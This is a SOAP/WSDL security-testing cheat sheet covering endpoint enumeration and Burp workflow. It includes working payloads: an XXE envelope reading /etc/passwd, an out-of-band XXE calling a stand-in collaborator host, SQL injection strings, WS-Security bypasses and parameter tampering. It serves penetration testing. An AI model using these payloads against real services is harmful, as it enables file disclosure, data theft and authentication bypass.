SOAP & WSDL Attacks
SOAP/WSDL security testing: WSDL enumeration, XXE via SOAP body, SQLi in SOAP parameters, WS-Security bypass, parameter tampering, and Burp Suite workflow for XML-based web services.
What is SOAP
SOAP (Simple Object Access Protocol) is an XML-based messaging protocol for web services. The WSDL (Web Services Description Language) document describes all available operations, parameters, and data types — essentially a service blueprint that also serves as an attacker’s map.
Detection & Enumeration
Step 1 — Find SOAP endpoints
# Common WSDL URL patterns
curl http://TARGET/service?wsdl
curl http://TARGET/api/soap?wsdl
curl http://TARGET/services/UserService?wsdl
curl http://TARGET/ws/v1?wsdl
# Wordlist-based discovery
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/wsdl.txtStep 2 — Parse the WSDL
WSDL tells you all the operations, their request parameters, and expected types.
# Pretty-print the WSDL
curl http://TARGET/service?wsdl | xmllint --format - | less
# Extract all operation names
curl http://TARGET/service?wsdl | grep -o '<wsdl:operation name="[^"]*"'
# Extract all message element names (parameters)
curl http://TARGET/service?wsdl | grep -o 'name="[^"]*"' | sort -uStep 3 — Generate test requests in Burp
Use Burp Suite Scanner or manually construct a SOAP envelope:
POST /service HTTP/1.1
Host: TARGET
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://TARGET/service/GetUser"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ser="http://TARGET/service">
<soapenv:Header/>
<soapenv:Body>
<ser:GetUser>
<ser:username>admin</ser:username>
</ser:GetUser>
</soapenv:Body>
</soapenv:Envelope>Exploit 1: XXE via SOAP Body
SOAP uses XML — inject an XXE entity declaration into the envelope:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ser="http://TARGET/service">
<soapenv:Header/>
<soapenv:Body>
<ser:GetUser>
<ser:username>&xxe;</ser:username>
</ser:GetUser>
</soapenv:Body>
</soapenv:Envelope>OOB XXE via external DTD (for blind XXE):
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://COLLABORATOR/evil.dtd"> %xxe;]>Exploit 2: SQL Injection in SOAP Parameters
Inject SQL payloads into SOAP parameters just like URL parameters:
<ser:username>' OR '1'='1'-- -</ser:username>
<ser:id>1 UNION SELECT NULL,NULL--</ser:id>Time-based blind:
<ser:username>admin'; SELECT SLEEP(5)-- -</ser:username>Exploit 3: WS-Security Header Bypass
If the SOAP service uses WS-Security for auth, try:
Remove the security header entirely — some services accept unauthenticated requests:
<soapenv:Envelope ...>
<!-- No Header element -->
<soapenv:Body>
<ser:AdminOperation>...</ser:AdminOperation>
</soapenv:Body>
</soapenv:Envelope>Username token with blank password:
<wsse:Security>
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password></wsse:Password>
</wsse:UsernameToken>
</wsse:Security>Exploit 4: Parameter Tampering
SOAP parameters map to function arguments — tamper with them:
<!-- Original: transfer $10 -->
<ser:amount>10</ser:amount>
<ser:account>ATTACKER</ser:account>
<!-- Modified: transfer -10 (negative) or 99999999 -->
<ser:amount>-10</ser:amount>
<ser:amount>99999999</ser:amount>Exploit 5: SOAP Action Spoofing
The SOAPAction HTTP header can override the operation in the body:
SOAPAction: "http://TARGET/service/AdminReset"Try setting the SOAPAction to privileged operations while keeping the body unchanged — some parsers trust the header over the body.
Burp Suite workflow
- Proxy — intercept SOAP requests; look for XML
Content-Type: text/xml. - Wsdler (BApp) — paste the WSDL URL; Wsdler parses it and generates test requests for all operations in Repeater.
- Repeater — inject XXE, SQLi, and tampered values into each parameter.
- Intruder — fuzz SOAP parameters with injection wordlists.
- Scanner — active scan tests XML injection and SQLi in SOAP bodies.